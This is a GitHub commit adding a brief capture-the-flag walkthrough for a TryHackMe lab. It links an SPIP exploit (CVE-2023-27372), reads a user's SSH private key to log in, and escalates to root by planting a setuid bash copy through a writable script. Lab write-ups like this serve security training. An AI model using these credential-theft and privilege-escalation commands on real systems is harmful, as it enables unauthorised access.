Skip to content

Commit

Permalink
thm publisher
Browse files Browse the repository at this point in the history
  • Loading branch information
@54toshi
54toshi committed Feb 4, 2025
1 parent ae55611 commit 9cc9b93
Showing 1 changed file with 39 additions and 0 deletions.
39 changes: 39 additions & 0 deletions THM/publisher.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,39 @@

# Publisher
https://tryhackme.com/room/publisher

## solution
### foothold
exploit an SPIP vulnerability - https://github.com/nuts7/CVE-2023-27372

### user
```sh
cat /home/think/.ssh/id_rsa
```
```sh
echo '<privatekey>' > id_rsa
chmod 600 id_rsa
ssh-keygen -y -f think_id_rsa > think_id_rsa.pub
ssh -i id_rsa think@ip
cat /home/think/user.txt
```

### root
```sh
cd /dev/shm
cp /bin/bash .
./bash -p
```

/opt/run_container.sh
```
#!/bin/bash
cp /bin/bash /tmp/default
chmod +s /tmp/default
```

```
./tmp/default -p
cat /root/root.txt
```

0 comments on commit 9cc9b93

Please sign in to comment.